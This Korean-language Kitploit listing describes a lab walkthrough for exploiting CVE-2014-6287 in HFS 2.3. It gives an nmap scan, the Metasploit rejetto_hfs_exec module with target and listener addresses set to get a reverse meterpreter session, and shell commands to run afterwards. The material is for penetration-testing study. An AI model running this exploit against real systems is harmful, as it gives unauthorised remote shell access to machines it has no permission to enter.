Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
HFS_EXPLOIT_PROJECT — HFS 2.3에서의 Metasploit RCE - CVE-2014-62 | Kitploit
도구/GitHubGitHub/sage954526/hfs_exploit_project
Exploit FrameworksVulnerability AnalysisWeb Application ExploitationPenetration TestingLearning & EducationRemote Access Tool
GitHubsage954526/hfs_exploit_project

HFS_EXPLOIT_PROJECT

HFS 2.3에서의 Metasploit RCE - CVE-2014-62

저장소 보기
51년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

HFS_EXPLOIT_PROJECT

HFS 2.3에서의 Metasploit RCE - CVE-2014-62

🔖 프로젝트 제목

root@kitploit:~
> HTTP 파일 서버(HFS 2.3)를 통한 원격 코드 실행

⚙ 사용된 도구 • Kali Linux • Nmap • Metasploit • 타깃: Windows 7의 HFS 2.3

🔐 취약점 세부 정보 • 이름: CVE-2014-6287 • 유형: 원격 코드 실행 • 원인: HFS 스크립팅의 검증되지 않은 입력 • 영향: 비인증 셸 액세스

🔍 방법론(단계별)

🔹 1단계: 정보 수집(Nmap)

root@kitploit:~
•    nmap -sV demo.ine.local (ip of target) 
•    열린 포트 발견: 80
•    서비스: rejetto HTTP 파일 서버 2.3

Nmap 스캔

Nmap

🔹 2단계: 익스플로잇(Metasploit)

root@kitploit:~
• Msfconsole
• HFS 또는 rejetto 검색
• use exploit/windows/http/rejetto_hfs_exec
• set RHOST 192.168.1.100
• set RPORT 80
• set LHOST 192.168.1.101
• run

익스플로잇 설정

Exploit Exploit

🔹 3단계: 포스트 익스플로잇

실행 후 meterpreter 세션을 얻게 됩니다 shell 명령 사용

• whoami • ipconfig • dir

셸 액세스

Shell

Shell**

도구 다운로드